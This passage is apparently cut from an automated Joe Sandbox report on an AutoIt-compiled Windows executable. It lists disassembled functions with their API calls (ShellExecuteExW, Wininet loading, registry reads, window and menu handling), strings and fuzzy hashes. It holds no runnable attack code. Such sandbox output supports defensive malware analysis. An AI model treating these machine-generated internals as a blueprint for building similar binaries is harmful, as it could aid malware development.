    • SelectObject.GDI32(?,00000000), ref: 0040CCD2
    • DeleteObject.GDI32(00000000), ref: 0040CCE3
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Path$ObjectStroke$DeleteFillSelect
    • String ID:
    • API String ID: 2625713937-0
    • Opcode ID: 23c54d3cf4bc0d418e7e8bc42216f99ef4e3a97e6112289699dbe474492b5dfa
    • Instruction ID: faaffeaf7891965e631770e75f3ffb588c3777943424dd606cefa2ef2d9927aa
    • Opcode Fuzzy Hash: 23c54d3cf4bc0d418e7e8bc42216f99ef4e3a97e6112289699dbe474492b5dfa
    • Instruction Fuzzy Hash: 6C018B31004706EBEB214F28D8487D57B71AB40322F108625F96AA61F0CB3999A2CF54
    Function 0040D03A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Line$Move
    • String ID:
    • API String ID: 3367123170-0
    • Opcode ID: 0106cda48ff9bbf4bdcf28e82eb6819dc74d54902d14879b2f11568f3fb45efe
    • Instruction ID: b97fa02212309c47107a525ebd6b8e18c6dd5977cae12453f45f519e06501ec8
    • Opcode Fuzzy Hash: 0106cda48ff9bbf4bdcf28e82eb6819dc74d54902d14879b2f11568f3fb45efe
    • Instruction Fuzzy Hash: DCF09B3640011CBBCF126FA1DC44EEF3F3AEB4AAA1F008419FA1855060C7369521FBA2
    Function 004249D1 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 268comCOMMON
    Download Yara Rule
    APIs
    • CoInitialize.OLE32(00000000), ref: 00424A34
    • CoCreateInstance.OLE32(0045AE98,00000000,00000001,0045AE88,?), ref: 00424A4B
    • CoUninitialize.OLE32(00000000), ref: 00424C9D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CreateInitializeInstanceUninitialize
    • String ID: .lnk
    • API String ID: 948891078-24824748
    • Opcode ID: d887169d9eb740b49fc11acaee5e4b9c5e1ca59e08b92ef3f464dddee186fe1a
    • Instruction ID: 247f32ee5b818feb01d68aeef06b919af8635f7b9c9483692209132b4a3e94cc
    • Opcode Fuzzy Hash: d887169d9eb740b49fc11acaee5e4b9c5e1ca59e08b92ef3f464dddee186fe1a
    • Instruction Fuzzy Hash: E1A18035A00214EFDF10DF54D885A9EBBB5EF85324F55809AE805AB351C738EE81CF98
    Function 00424CB5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206comCOMMON
    Download Yara Rule
    APIs
    • CoInitialize.OLE32(00000000), ref: 00424D37
    • CoCreateInstance.OLE32(0045AE98,00000000,00000001,0045AE88,?), ref: 00424D4E
    • CoUninitialize.OLE32 ref: 00424EDC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CreateInitializeInstanceUninitialize
    • String ID: .lnk
    • API String ID: 948891078-24824748
    • Opcode ID: 2682ff3a89910deb0d550411cc5477f59204b4fe6d856b899973f09ba1f55339
    • Instruction ID: 6601a6f92ded61f3dc518123d982e861e17d97c3953e59de5f2fbdd9491a0982
    • Opcode Fuzzy Hash: 2682ff3a89910deb0d550411cc5477f59204b4fe6d856b899973f09ba1f55339
    • Instruction Fuzzy Hash: CD619E71600218AFDB00EFA4DC85EEE7779EF88354F10454AF505AB291CA78EE81CB94
    Function 0042E1C8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 193COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0042FF39: LoadLibraryA.KERNEL32(kernel32.dll,0042E1E0), ref: 0042FF44
      • Part of subcall function 0042FF39: GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 0042FF56
    • GlobalMemoryStatus.KERNEL32(?), ref: 0042E2D2
    • FreeLibrary.KERNEL32(00000000), ref: 0042E40A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Library$AddressFreeGlobalLoadMemoryProcStatus
    • String ID: $@
    • API String ID: 994989557-1077428164
    • Opcode ID: 755732f14303fd7855877f7d53b39952d9f77ec8dbe8b95e36a72e8eda6e09c8
    • Instruction ID: 13678e41d3e0e1f1e17025958ba3afce431628d6abb03d136634acb3700533c3
    • Opcode Fuzzy Hash: 755732f14303fd7855877f7d53b39952d9f77ec8dbe8b95e36a72e8eda6e09c8
    • Instruction Fuzzy Hash: 9B716030A04E1CE7CF10AFA6F945ADDBBB0FF4C316F115099E584A2185DF7A95A4C70A
    Function 0043903B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 176COMMON
    Download Yara Rule
    APIs
    • ShellExecuteExW.SHELL32(?), ref: 00439188
    • CloseHandle.KERNEL32(00000000,00000001), ref: 00439216
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseExecuteHandleShell
    • String ID: @$open
    • API String ID: 283469938-267353779
    • Opcode ID: e4a9db3d1919b6371b6c8a268be14a6d3664e66bb5a603e284bbdb5742653bf9
    • Instruction ID: feda34889901b56425d67917506db13db688c050cc61e307db15a32002fab435
    • Opcode Fuzzy Hash: e4a9db3d1919b6371b6c8a268be14a6d3664e66bb5a603e284bbdb5742653bf9
    • Instruction Fuzzy Hash: 7D61CF35800216EBEF14EF96C849A9EB7B4BF08324F14416BE81577251CBB8AD85CBD9
    Function 004137E9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175windowCOMMON
    Download Yara Rule
    APIs
    • GetMenuItemInfoW.USER32(00000000,000000FF,00000000,0000002C), ref: 004138ED
    • SetMenuItemInfoW.USER32(00000000,000000FF,00000000,0000002C), ref: 0041399F
    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000), ref: 004139BA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ItemMenu$Info$Default
    • String ID: ,
    • API String ID: 1306138088-3772416878
    • Opcode ID: d633449f2b5308c3e433b95ac5c04283cc0dfadb266ae2d80fafc6eaca39abdf
    • Instruction ID: 0562580491547a8833eccc7864831183b09bff118f29a06cf6e1091235e7571e
    • Opcode Fuzzy Hash: d633449f2b5308c3e433b95ac5c04283cc0dfadb266ae2d80fafc6eaca39abdf
    • Instruction Fuzzy Hash: 1F5116B1A14248AAEB21DF65C4847DFBBF5AF40325F24845FE481A6281C7BD9FC4CB19
    Function 0042A72A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0042FE9D: LoadLibraryA.KERNEL32(Wininet.dll,0042A74E), ref: 0042FEA8
      • Part of subcall function 0042FE9D: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 0042FEBA
    • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042A886
      • Part of subcall function 0041FAEE: LoadStringW.USER32(00000066,?,00000FFF,00479E08), ref: 0041FB43
      • Part of subcall function 0041FAEE: LoadStringW.USER32(0047BD30,?,00000FFF), ref: 0041FB56
    • FreeLibrary.KERNEL32(00000000,0000008C,000000FF), ref: 0042A76B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: LibraryLoad$FreeString$AddressProc
    • String ID: abort
    • API String ID: 160771276-4206212132
    • Opcode ID: 7949010c7ebb62d98c8d4f2881de47468f393df9578b266d1d8b20c11ed8cdc2
    • Instruction ID: 05c2d4eacd22ad3a369de7ab5a96b2d38cb26c9fb751937e48658670b96f3f86
    • Opcode Fuzzy Hash: 7949010c7ebb62d98c8d4f2881de47468f393df9578b266d1d8b20c11ed8cdc2
    • Instruction Fuzzy Hash: D241F730B00224FBDB15AB65E8457AAB3A4AF08315F50816BFC1596242C73C9E66CBDF
    Function 0041352C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112windowCOMMON
    Download Yara Rule
    APIs
    • GetMenuItemInfoW.USER32(?,00000001,00000000,0000002C), ref: 004135A0
    • DeleteMenu.USER32(?,?,00000000,?,00000001,00000000,0000002C), ref: 004135EB
    • DeleteMenu.USER32(?,00000001,00000000), ref: 00413642
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Menu$Delete$InfoItem
    • String ID: ,
    • API String ID: 135850232-3772416878
    • Opcode ID: eadcb55df29078d9890b1672165eda3be909e78da1399042eef8c1ff167db386
    • Instruction ID: 3c634a933cfbc8d95b1f8b83f838f06eb693c9081707924d3606c629297d5029
    • Opcode Fuzzy Hash: eadcb55df29078d9890b1672165eda3be909e78da1399042eef8c1ff167db386
    • Instruction Fuzzy Hash: D441D231604244FFDB20CF68C984BD9BBF1AF05325F2485A9E955AB391C378EE81CB55
    Function 004155D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102filestringCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00414E6E: GetFullPathNameW.KERNEL32(00000000,00000104,00479BFC,00000000,00479BFC,0047BD30,?,0040FF5E,00479BFC,00000000), ref: 00414E89
    • lstrcmpiW.KERNEL32(?,?), ref: 0041560D
    • MoveFileW.KERNEL32(?,?), ref: 00415643
      • Part of subcall function 0041553B: GetFileAttributesW.KERNEL32(0041568E,?,?,?,0041568E,?), ref: 00415558
      • Part of subcall function 0041553B: GetLastError.KERNEL32(?,?,?,0041568E,?), ref: 00415563
      • Part of subcall function 0041553B: CreateDirectoryW.KERNEL32(0041568E,00000000,?,?,?,0041568E,?), ref: 00415577
    • SHFileOperationW.SHELL32(?), ref: 0041570F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPathlstrcmpi
    • String ID: \*.*
    • API String ID: 1621038701-1173974218
    • Opcode ID: b086c2ac43184cb1b9658ccf7074614584863979fe4236bf43018c14748a7fe8
    • Instruction ID: 5b62e6b32fe5bc9b2134debb3df8c4339f2b18e98be065067f761ca7b62991fe
    • Opcode Fuzzy Hash: b086c2ac43184cb1b9658ccf7074614584863979fe4236bf43018c14748a7fe8
    • Instruction Fuzzy Hash: D131F07180131DAADF50EFE5D845ADEB7BCAF49314F9044ABE508E3141E7389B898F58
    Function 0040B9B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
    Download Yara Rule
    APIs
    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,SysTreeView32,0045C6D0,00000000,?,?,?,?,?), ref: 0040BA50
    • 73A245F0.USER32(?,?,?,?,?,?,?,?,?,?,?,?,000000F0,?,SysTreeView32,0045C6D0), ref: 0040BA6C
    • 73A259E0.USER32(?,000000F0,00000000,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040BA7C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A245A259Window
    • String ID: SysTreeView32
    • API String ID: 2564405531-1698111956
    • Opcode ID: 1fe741163138ec06834e06b1affa6077f10f50cb63632b2ff6ec95e9926e667a
    • Instruction ID: b896b0c600f775b4fdf182cd940d7d3834a46d01ff6888fb1c5314ea8e63b4bb
    • Opcode Fuzzy Hash: 1fe741163138ec06834e06b1affa6077f10f50cb63632b2ff6ec95e9926e667a
    • Instruction Fuzzy Hash: 8B31BE71604209AFCF118F24CC41BDA3B65EF18360F20023AFE65A62D1C778D991DB98
    Function 0040B435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,00000469,?,00000000), ref: 0040B4E8
    • SendMessageW.USER32(?,00000465,00000000,80017FFF), ref: 0040B4F8
    • 73A25CF0.USER32(?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040B50D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend
    • String ID: msctls_updown32
    • API String ID: 3850602802-2298589950
    • Opcode ID: 6379d174e26c128a804c38e3f495b71b257c212925a7d6601335cd6feca22ee9
    • Instruction ID: 3d460db20afce04995f9f54f52d8810648ed05b4425190c924ea1cb92289fdf7
    • Opcode Fuzzy Hash: 6379d174e26c128a804c38e3f495b71b257c212925a7d6601335cd6feca22ee9
    • Instruction Fuzzy Hash: 46318FB1600209BFDB00CF24DC81DAB37A9EF59358B10406AF901A73D1DB34ED52DBA8
    Function 0042026C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
    Download Yara Rule
    APIs
    • CharUpperBuffW.USER32(?,00420227,@ExitCode,0047A0C0,0045C6D0,00479E08,00479E08,?,00479BD8,00478410,00000000,00479E08,00479E08,00000000), ref: 004202DF
    • CharUpperBuffW.USER32(?,00420227,@ExitMethod,0047BD20,?,00000000,?,00479BD8,00478410,00000000,00479E08,00479E08,00000000), ref: 0042031E
      • Part of subcall function 004183F6: VariantClear.OLEAUT32(?), ref: 00418410
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: BuffCharUpper$ClearVariant
    • String ID: @ExitCode$@ExitMethod
    • API String ID: 3959644497-2214745556
    • Opcode ID: 7868d53681e0f26286d2c3d1cf1f33f37733852ae835ac5d67c673bbe9c66590
    • Instruction ID: 3d018d55bbbd5adba44dc97a11c7304ca77cc37ef3b631a2418edd763fc03717
    • Opcode Fuzzy Hash: 7868d53681e0f26286d2c3d1cf1f33f37733852ae835ac5d67c673bbe9c66590
    • Instruction Fuzzy Hash: BE314D76900219AFDB10ABA9EC41EEE77B9EF48315F10842AF50173152DB786949CBA8
    Function 0040AA6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0040AAF9
    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0040AB04
    • MoveWindow.USER32(?,?,?,?,?,00000000,?,Listbox,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0040AB23
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$MoveWindow
    • String ID: Listbox
    • API String ID: 3315199576-2633736733
    • Opcode ID: f2c24b57c72e74bd4c16310fe02d369d1d4bcaf66d9730a99e10fc43add17c47
    • Instruction ID: 900ec8e690eb78fd8c93632f1fd8deb6979e6213f13d5d8211199dabb923d6dc
    • Opcode Fuzzy Hash: f2c24b57c72e74bd4c16310fe02d369d1d4bcaf66d9730a99e10fc43add17c47
    • Instruction Fuzzy Hash: EB212C7150020DBFDF229F50CD84DDA3BA9EF08398F014226FA44662A1C77A9CA1DB95
    Function 004042C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70windowCOMMON
    Download Yara Rule
    APIs
    • GetClassNameW.USER32(?,?,0000007F), ref: 0040431C
    • IsDialogMessageW.USER32(?,?), ref: 0040435B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ClassDialogMessageName
    • String ID: AutoIt v3$AutoIt v3 GUI
    • API String ID: 682379513-3732297864
    • Opcode ID: 2c04c3e885fe4a13a4564aa067ff1c05ecb8970d72aafcf156814eb3c7134043
    • Instruction ID: 31906f7eeedf88e2066356eeae69c8cc25b19cc0742b4b4f6c180b3507dca45f
    • Opcode Fuzzy Hash: 2c04c3e885fe4a13a4564aa067ff1c05ecb8970d72aafcf156814eb3c7134043
    • Instruction Fuzzy Hash: 1021C0B1700304EFDB18DEA4D884B9A73A8FF50305F1010BAEE45E3190E778ED88CA48
    Function 0040B2D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0040B341
    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0040B356
    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0040B362
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend
    • String ID: msctls_trackbar32
    • API String ID: 3850602802-1010561917
    • Opcode ID: b6b8602c3e9a2c36321137a8017de26e3863274e984a736940d36414d29ae470
    • Instruction ID: 53a97837dd6e4f9169c4f51732602e26d21817ba787e7e5a00f6ab4d683d84b6
    • Opcode Fuzzy Hash: b6b8602c3e9a2c36321137a8017de26e3863274e984a736940d36414d29ae470
    • Instruction Fuzzy Hash: 6B114C71500248BACF218F55CC48ECB3FB5EF8A768F11426AFE146A2A1C3759C51DBA8
    Function 00415DF7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00414513: RegOpenKeyExW.ADVAPI32(00000004,0045DC34,00000000,00000001,?,?,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,0047BCF5,00000001), ref: 00414532
